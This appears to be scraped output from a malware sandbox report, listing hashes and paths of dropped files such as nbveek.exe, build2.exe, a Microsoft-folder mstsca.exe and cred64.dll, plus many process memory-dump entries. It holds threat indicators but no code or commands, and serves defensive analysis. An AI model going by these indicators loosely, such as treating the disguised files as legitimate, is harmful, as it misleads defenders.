97406ce4e2f14cee1e32d3bcd082878a106d34e179e7ab9bc04aa92e424e72bc

SHA512
e3b1a6088e0c96ce01972cb507d231927f398aebfa2e1229c9b9bfa0a87814903035cb2981b3003cd805212c5e24a37216e60f2d6cabc7ad4d42823e838d07c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\e76728db77\nbveek.exe
Filesize
235KB

MD5
cb41a6b7a7f4a5bfc31a327e0f09e85e

SHA1
e6651675fe2c060c92fb2ad03de90d78d30116d4

SHA256
97406ce4e2f14cee1e32d3bcd082878a106d34e179e7ab9bc04aa92e424e72bc

SHA512
e3b1a6088e0c96ce01972cb507d231927f398aebfa2e1229c9b9bfa0a87814903035cb2981b3003cd805212c5e24a37216e60f2d6cabc7ad4d42823e838d07c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\e76728db77\nbveek.exe
Filesize
235KB

MD5
cb41a6b7a7f4a5bfc31a327e0f09e85e

SHA1
e6651675fe2c060c92fb2ad03de90d78d30116d4

SHA256
97406ce4e2f14cee1e32d3bcd082878a106d34e179e7ab9bc04aa92e424e72bc

SHA512
e3b1a6088e0c96ce01972cb507d231927f398aebfa2e1229c9b9bfa0a87814903035cb2981b3003cd805212c5e24a37216e60f2d6cabc7ad4d42823e838d07c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\e76728db77\nbveek.exe
Filesize
235KB

MD5
cb41a6b7a7f4a5bfc31a327e0f09e85e

SHA1
e6651675fe2c060c92fb2ad03de90d78d30116d4

SHA256
97406ce4e2f14cee1e32d3bcd082878a106d34e179e7ab9bc04aa92e424e72bc

SHA512
e3b1a6088e0c96ce01972cb507d231927f398aebfa2e1229c9b9bfa0a87814903035cb2981b3003cd805212c5e24a37216e60f2d6cabc7ad4d42823e838d07c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\e76728db77\nbveek.exe
Filesize
235KB

MD5
cb41a6b7a7f4a5bfc31a327e0f09e85e

SHA1
e6651675fe2c060c92fb2ad03de90d78d30116d4

SHA256
97406ce4e2f14cee1e32d3bcd082878a106d34e179e7ab9bc04aa92e424e72bc

SHA512
e3b1a6088e0c96ce01972cb507d231927f398aebfa2e1229c9b9bfa0a87814903035cb2981b3003cd805212c5e24a37216e60f2d6cabc7ad4d42823e838d07c1

Download Submit
C:\Users\Admin\AppData\Local\b3597e1f-280e-4063-a1fb-135df7fbaff7\build2.exe
Filesize
409KB

MD5
a131064868de7468d2e768211431401b

SHA1
381ad582f72b30b4764afe0a817569b384be65a2

SHA256
027bcfc4c5b4a06371e94f4a6b5f69cbee5bcad651d91115132844a2c10885a1

SHA512
40fc84899d7bed5c49980f984e3c1446dece3861e5e107fa71e1876f4b778aa8369f03422a971d144f8e65f62a109f53ba94e86bc6ddec478d1bc71f3bb29309

Download Submit
C:\Users\Admin\AppData\Local\b3597e1f-280e-4063-a1fb-135df7fbaff7\build2.exe
Filesize
409KB

MD5
a131064868de7468d2e768211431401b

SHA1
381ad582f72b30b4764afe0a817569b384be65a2

SHA256
027bcfc4c5b4a06371e94f4a6b5f69cbee5bcad651d91115132844a2c10885a1

SHA512
40fc84899d7bed5c49980f984e3c1446dece3861e5e107fa71e1876f4b778aa8369f03422a971d144f8e65f62a109f53ba94e86bc6ddec478d1bc71f3bb29309

Download Submit
C:\Users\Admin\AppData\Local\b3597e1f-280e-4063-a1fb-135df7fbaff7\build2.exe
Filesize
409KB

MD5
a131064868de7468d2e768211431401b

SHA1
381ad582f72b30b4764afe0a817569b384be65a2

SHA256
027bcfc4c5b4a06371e94f4a6b5f69cbee5bcad651d91115132844a2c10885a1

SHA512
40fc84899d7bed5c49980f984e3c1446dece3861e5e107fa71e1876f4b778aa8369f03422a971d144f8e65f62a109f53ba94e86bc6ddec478d1bc71f3bb29309

Download Submit
C:\Users\Admin\AppData\Local\b3597e1f-280e-4063-a1fb-135df7fbaff7\build3.exe
Filesize
9KB

MD5
9ead10c08e72ae41921191f8db39bc16

SHA1
abe3bce01cd34afc88e2c838173f8c2bd0090ae1

SHA256
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Local\b3597e1f-280e-4063-a1fb-135df7fbaff7\build3.exe
Filesize
9KB

MD5
9ead10c08e72ae41921191f8db39bc16

SHA1
abe3bce01cd34afc88e2c838173f8c2bd0090ae1

SHA256
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
Filesize
9KB

MD5
9ead10c08e72ae41921191f8db39bc16

SHA1
abe3bce01cd34afc88e2c838173f8c2bd0090ae1

SHA256
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
Filesize
9KB

MD5
9ead10c08e72ae41921191f8db39bc16

SHA1
abe3bce01cd34afc88e2c838173f8c2bd0090ae1

SHA256
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Roaming\bf045808586a24\cred64.dll
Filesize
126KB

MD5
628a26398301374c915780252650990b

SHA1
5d31e095d924e3982422aa1be3959c2e3353e602

SHA256
7c25d5c136fff48f875478d8f9f3a80f4f72a6fb5aa80f7954a3ab3ef6ddbd78

SHA512
ec4deacbb87a2ac52e42eeff86506d391c273741bab16a18973adf4d127e29d6d231ef405c7428e1ec5fe9d3b7a4f4451efb9c9c8eee886e8b5621b785f81705

Download Submit
C:\Users\Admin\AppData\Roaming\bf045808586a24\cred64.dll
Filesize
126KB

MD5
628a26398301374c915780252650990b

SHA1
5d31e095d924e3982422aa1be3959c2e3353e602

SHA256
7c25d5c136fff48f875478d8f9f3a80f4f72a6fb5aa80f7954a3ab3ef6ddbd78

SHA512
ec4deacbb87a2ac52e42eeff86506d391c273741bab16a18973adf4d127e29d6d231ef405c7428e1ec5fe9d3b7a4f4451efb9c9c8eee886e8b5621b785f81705

Download Submit
C:\Users\Admin\AppData\Roaming\bf045808586a24\cred64.dll
Filesize
126KB

MD5
628a26398301374c915780252650990b

SHA1
5d31e095d924e3982422aa1be3959c2e3353e602

SHA256
7c25d5c136fff48f875478d8f9f3a80f4f72a6fb5aa80f7954a3ab3ef6ddbd78

SHA512
ec4deacbb87a2ac52e42eeff86506d391c273741bab16a18973adf4d127e29d6d231ef405c7428e1ec5fe9d3b7a4f4451efb9c9c8eee886e8b5621b785f81705

Download Submit
\??\pipe\crashpad_4680_YVKWPOETKCQZFMQF
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/408-190-0x0000000000000000-mapping.dmp

Download
memory/996-161-0x0000000000560000-0x0000000000569000-memory.dmp

Filesize
36KB

Download
memory/996-162-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/996-158-0x00000000005A9000-0x00000000005BF000-memory.dmp

Filesize
88KB

Download
memory/996-136-0x0000000000000000-mapping.dmp

Download
memory/996-203-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/1308-188-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/1308-200-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/1308-205-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/1308-182-0x0000000000000000-mapping.dmp

Download
memory/1308-183-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/1308-185-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/1512-328-0x0000000004EF0000-0x0000000005030000-memory.dmp

Filesize
1.2MB

Download
memory/1512-307-0x0000000005D80000-0x00000000064A5000-memory.dmp

Filesize
7.1MB

Download
memory/1512-331-0x0000000004EF0000-0x0000000005030000-memory.dmp

Filesize
1.2MB

Download
memory/1512-279-0x0000000000000000-mapping.dmp

Download
memory/1512-342-0x0000000005D80000-0x00000000064A5000-memory.dmp

Filesize
7.1MB

Download
memory/1512-333-0x0000000004EF0000-0x0000000005030000-memory.dmp

Filesize
1.2MB

Download
memory/1512-332-0x0000000004EF0000-0x0000000005030000-memory.dmp

Filesize
1.2MB

Download
memory/1512-337-0x0000000004F69000-0x0000000004F6B000-memory.dmp

Filesize
8KB

Download
memory/1512-308-0x0000000005D80000-0x00000000064A5000-memory.dmp

Filesize
7.1MB

Download
memory/1512-311-0x0000000004EF0000-0x0000000005030000-memory.dmp

Filesize
1.2MB

Download
memory/1512-312-0x0000000004EF0000-0x0000000005030000-memory.dmp

Filesize
1.2MB

Download
memory/1676-204-0x0000000000000000-mapping.dmp

Download
memory/1676-212-0x0000000002054000-0x00000000020E6000-memory.dmp

Filesize
584KB

Download
memory/1836-193-0x0000000000000000-mapping.dmp

Download
memory/1884-186-0x0000000001FEF000-0x0000000002081000-memory.dmp

Filesize
584KB

Download
memory/1884-187-0x00000000021E0000-0x00000000022FB000-memory.dmp

Filesize
1.1MB

Download
memory/1884-157-0x0000000000000000-mapping.dmp

Download
memory/1952-288-0x0000000000000000-mapping.dmp

Download
memory/1952-289-0x0000000000400000-0x0000000000436000-memory.dmp

Filesize
216KB

Download
memory/1952-295-0x00000000066B0000-0x00000000066CE000-memory.dmp

Filesize
120KB

Download
memory/2064-323-0x0000000000400000-0x0000000000466000-memory.dmp

Filesize
408KB

Download
memory/2064-322-0x0000000000000000-mapping.dmp

Download
memory/2144-334-0x00007FF71E956890-mapping.dmp

Download
memory/2144-335-0x000001A3D0FA0000-0x000001A3D10E0000-memory.dmp

Filesize
1.2MB

Download
memory/2144-336-0x000001A3D0FA0000-0x000001A3D10E0000-memory.dmp

Filesize
1.2MB

Download
memory/2144-338-0x0000000000300000-0x0000000000519000-memory.dmp

Filesize
2.1MB

Download
memory/2144-339-0x000001A3CF5D0000-0x000001A3CF7FA000-memory.dmp

Filesize
2.2MB

Download
memory/2272-178-0x0000000000000000-mapping.dmp

Download
memory/2420-196-0x0000000000000000-mapping.dmp

Download
memory/2592-242-0x0000000006E00000-0x0000000006E50000-memory.dmp

Filesize
320KB

Download
memory/2592-207-0x00000000049F0000-0x0000000004F94000-memory.dmp

Filesize
5.6MB

Download
memory/2592-214-0x0000000000708000-0x0000000000737000-memory.dmp

Filesize
188KB

Download
memory/2592-243-0x0000000000708000-0x0000000000737000-memory.dmp

Filesize
188KB

Download
memory/2592-215-0x00000000020D0000-0x000000000211B000-memory.dmp

Filesize
300KB

Download
memory/2592-264-0x0000000000708000-0x0000000000737000-memory.dmp

Filesize
188KB

Download
memory/2592-265-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/2592-241-0x0000000006D80000-0x0000000006DF6000-memory.dmp

Filesize
472KB

Download
memory/2592-197-0x0000000000000000-mapping.dmp

Download
memory/2592-216-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/2636-194-0x0000000000000000-mapping.dmp

Download
memory/2644-192-0x0000000000000000-mapping.dmp

Download
memory/3012-294-0x0000000000F40000-0x0000000000FA7000-memory.dmp

Filesize
412KB

Download
memory/3012-285-0x0000000000000000-mapping.dmp

Download
memory/3180-142-0x0000000000000000-mapping.dmp

Download
memory/3244-208-0x0000000000000000-mapping.dmp

Download
memory/3244-213-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3244-217-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3244-211-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3244-244-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/3408-324-0x0000000000000000-mapping.dmp

Download
memory/3492-145-0x0000000000000000-mapping.dmp

Download
memory/3860-302-0x0000000000000000-mapping.dmp

Download
memory/3868-236-0x0000000000000000-mapping.dmp

Download
memory/3884-239-0x0000000000000000-mapping.dmp

Download
memory/3932-154-0x0000000000000000-mapping.dmp

Download
memory/3972-191-0x0000000000000000-mapping.dmp

Download
memory/3996-153-0x0000000000000000-mapping.dmp

Download
memory/4004-189-0x0000000000000000-mapping.dmp

Download
memory/4064-172-0x0000000000000000-mapping.dmp

Download
memory/4064-340-0x0000000000000000-mapping.dmp

Download
memory/4236-344-0x0000000002A70000-0x0000000002B5E000-memory.dmp

Filesize
952KB

Download
memory/4236-352-0x0000000002A70000-0x0000000002B5E000-memory.dmp

Filesize
952KB

Download
memory/4236-341-0x0000000000000000-mapping.dmp

Download
memory/4236-343-0x0000000002880000-0x0000000002971000-memory.dmp

Filesize
964KB

Download
memory/4236-349-0x0000000002C40000-0x0000000002D01000-memory.dmp

Filesize
772KB

Download
memory/4236-348-0x0000000002B60000-0x0000000002C36000-memory.dmp

Filesize
856KB

Download
memory/4268-224-0x0000000000000000-mapping.dmp

Download
memory/4268-233-0x0000000000678000-0x00000000006A6000-memory.dmp

Filesize
184KB

Download
memory/4268-234-0x0000000002000000-0x0000000002053000-memory.dmp

Filesize
332KB

Download
memory/4348-296-0x0000000000000000-mapping.dmp

Download
memory/4388-168-0x0000000000000000-mapping.dmp

Download
memory/4472-177-0x00000000050C0000-0x00000000050D2000-memory.dmp

Filesize
72KB

Download
memory/4472-222-0x0000000005580000-0x0000000005612000-memory.dmp

Filesize
584KB

Download
memory/4472-180-0x0000000005120000-0x000000000515C000-memory.dmp

Filesize
240KB

Download
memory/4472-228-0x00000000088E0000-0x0000000008E0C000-memory.dmp

Filesize
5.2MB

Download
memory/4472-227-0x0000000006430000-0x00000000065F2000-memory.dmp

Filesize
1.8MB

Download
memory/4472-165-0x0000000000000000-mapping.dmp

Download
memory/4472-223-0x0000000005C70000-0x0000000005CD6000-memory.dmp

Filesize
408KB

Download
memory/4472-166-0x0000000000400000-0x0000000000460000-memory.dmp

Filesize
384KB

Download
memory/4472-176-0x0000000005190000-0x000000000529A000-memory.dmp

Filesize
1.0MB

Download
memory/4472-173-0x0000000005650000-0x0000000005C68000-memory.dmp

Filesize
6.1MB

Download
memory/4476-164-0x0000000000400000-0x0000000000453000-memory.dmp

Filesize
332KB

Download
memory/4476-139-0x0000000000000000-mapping.dmp

Download
memory/4476-163-0x0000000000599000-0x00000000005AF000-memory.dmp

Filesize
88KB

Download
memory/4628-150-0x0000000000000000-mapping.dmp

Download
memory/4676-195-0x0000000000000000-mapping.dmp

Download
memory/4760-280-0x000000000213F000-0x0000000002215000-memory.dmp

Filesize
856KB

Download
memory/4760-281-0x0000000002320000-0x0000000002435000-memory.dmp

Filesize
1.1MB

Download
memory/4760-282-0x0000000000400000-0x0000000000517000-memory.dmp

Filesize
1.1MB

Download
memory/4760-276-0x0000000000000000-mapping.dmp

Download
memory/4800-135-0x0000000000400000-0x0000000000453000-memory.dmp

Filesize
332KB

Download
memory/4800-134-0x0000000000400000-0x0000000000453000-memory.dmp

Filesize
332KB

Download
memory/4800-133-0x00000000005E0000-0x00000000005E9000-memory.dmp

Filesize
36KB

Download
memory/4800-132-0x0000000000739000-0x000000000074F000-memory.dmp

Filesize
88KB

Download
memory/4820-232-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/4820-245-0x0000000060900000-0x0000000060992000-memory.dmp

Filesize
584KB

Download
memory/4820-235-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/4820-240-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/4820-229-0x0000000000000000-mapping.dmp

Download
memory/4820-269-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/4820-230-0x0000000000400000-0x0000000000467000-memory.dmp

Filesize
412KB

Download
memory/4848-273-0x0000000000000000-mapping.dmp

Download
memory/4912-268-0x0000000000000000-mapping.dmp

Download
memory/4952-301-0x0000000000000000-mapping.dmp

Download
memory/5028-303-0x0000000000000000-mapping.dmp

Download
memory/5028-306-0x0000000000260000-0x0000000000324000-memory.dmp

Filesize
784KB

Download
memory/5048-326-0x0000000140000000-0x0000000140617000-memory.dmp

Filesize
6.1MB

Download
memory/5048-325-0x0000000000000000-mapping.dmp

Download
memory/5052-309-0x0000000000000000-mapping.dmp

Download
memory/5052-315-0x00000000004D0000-0x00000000004F4000-memory.dmp

Filesize
144KB

Download
memory/5060-201-0x0000000000000000-mapping.dmp

Download
memory/5076-270-0x0000000000000000-mapping.dmp

Download
memory/5160-345-0x0000000000000000-mapping.dmp

Download
memory/5160-346-0x0000000000838000-0x0000000000867000-memory.dmp

Filesize
188KB

Download
memory/5160-347-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/5160-362-0x0000000000838000-0x0000000000867000-memory.dmp

Filesize
188KB

Download
memory/5160-364-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/5160-363-0x0000000000838000-0x0000000000867000-memory.dmp

Filesize
188KB

Download
memory/5240-353-0x0000000000000000-mapping.dmp

Download
memory/5296-360-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/5296-355-0x0000000000400000-0x0000000000427000-memory.dmp

Filesize
156KB

Download
memory/5296-354-0x0000000000000000-mapping.dmp

Download
memory/5296-365-0x0000000000B00000-0x0000000000B1D000-memory.dmp

Filesize
116KB

Download
memory/5296-361-0x0000000000BD5000-0x0000000000BD8000-memory.dmp

Filesize
12KB

Download
memory/5564-371-0x00007FFC83C30000-0x00007FFC846F1000-memory.dmp

Filesize
10.8MB

Download
memory/5564-366-0x0000000000000000-mapping.dmp

Download
memory/5564-367-0x0000000000660000-0x0000000000CA2000-memory.dmp

Filesize
6.3MB

Download
memory/5564-376-0x00007FFC83C30000-0x00007FFC846F1000-memory.dmp

Filesize
10.8MB

Download
memory/5608-377-0x00007FF43E780000-0x00007FF43E879000-memory.dmp

Filesize
996KB

Download
memory/5608-373-0x000001A832600000-0x000001A832607000-memory.dmp

Filesize
28KB

Download
memory/5608-368-0x0000000000000000-mapping.dmp

Download
memory/5668-370-0x0000000000739BF0-mapping.dmp

Download
memory/5668-378-0x0000000000400000-0x000000000073C000-memory.dmp

Filesize
3.2MB

Download
memory/5756-379-0x0000000000000000-mapping.dmp

Download
memory/5836-381-0x0000000000000000-mapping.dmp

Download
memory/5884-382-0x0000000000000000-mapping.dmp

Download
memory/5936-383-0x0000000000000000-mapping.dmp

Download
memory/5988-384-0x0000000000000000-mapping.dmp

Download